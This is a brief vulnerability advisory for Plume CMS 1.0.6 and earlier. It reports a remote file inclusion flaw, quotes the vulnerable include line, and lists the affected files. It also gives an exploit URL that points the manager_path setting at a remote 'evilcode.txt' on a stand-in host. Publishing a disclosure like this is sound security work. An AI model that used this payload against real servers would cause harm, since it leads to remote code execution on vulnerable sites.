Plume CMS Multiple Remote File Include Vulnerabilities Vulnerable Versions: Plume CMS <= 1.0.6 Vendor: Plume CMS http://plume-cms.net -Vulnerable Code include $_PX_config['manager_path'].'/directory/_file.php'; -Files Affected ./articles.php ./categories.php ./index.php ./news.php ./prefs.php ./sites.php ./subtypes.php ./users.php ./xmedia.php ./frontinc/class.template.php ./frontinc/prepend.php ./inc/lib.text.php ./install/index.php ./install/upgrade.php ./tools/htaccess/index.php -Exploit http://www.example.com/path/index.php?_PX_config[manager_path]=http://host/evilcode.txt? -Credits Vagner Rodrigues Fernandes (BugReport) vagner.rodrigues@gmail.com